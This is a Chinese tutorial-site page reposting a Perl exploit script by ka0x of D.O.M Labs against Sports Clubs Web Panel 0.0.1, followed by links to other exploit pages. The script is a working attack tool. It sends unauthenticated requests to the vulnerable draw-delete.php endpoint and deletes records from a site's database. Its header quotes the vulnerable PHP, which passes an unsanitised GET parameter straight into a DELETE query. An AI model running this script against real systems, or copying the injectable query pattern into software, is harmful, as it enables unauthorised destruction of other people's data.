手机
当前位置:查字典教程网 >网络安全 >Exploit >Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
摘要:#!/usr/bin/perl-W#SportsClubsWebPanel0.0.1RemoteGameDeleteExploit#File...

#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];

# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>

# D.O.M Labs - Security Researchers

# - www.domlabs.org -

# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3

use LWP::UserAgent; my $host = $ARGV[0];

my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE

{

die "

- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -

- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>

ex: ./$0 http://localhost/sportspanel 2

";

} my $ua = LWP::UserAgent->new() or die;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);

my $res = $ua->request($req);

my $con = $res->content; if ($res->is_success){

if($con =~ /$did/){

print "[ ] The Game "$did" has been deleted from the database!n";

}

} else{

print "[-] Exploit Failed!";

} __END__

【Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit】相关文章:

LoveCMS 1.6.2 Final Update Settings Remote Exploit

WS_FTP Home/Professional FTP Client Remote Format String PoC

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

The Personal FTP Server 6.0f RETR Denial of Service Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

精品推荐
分类导航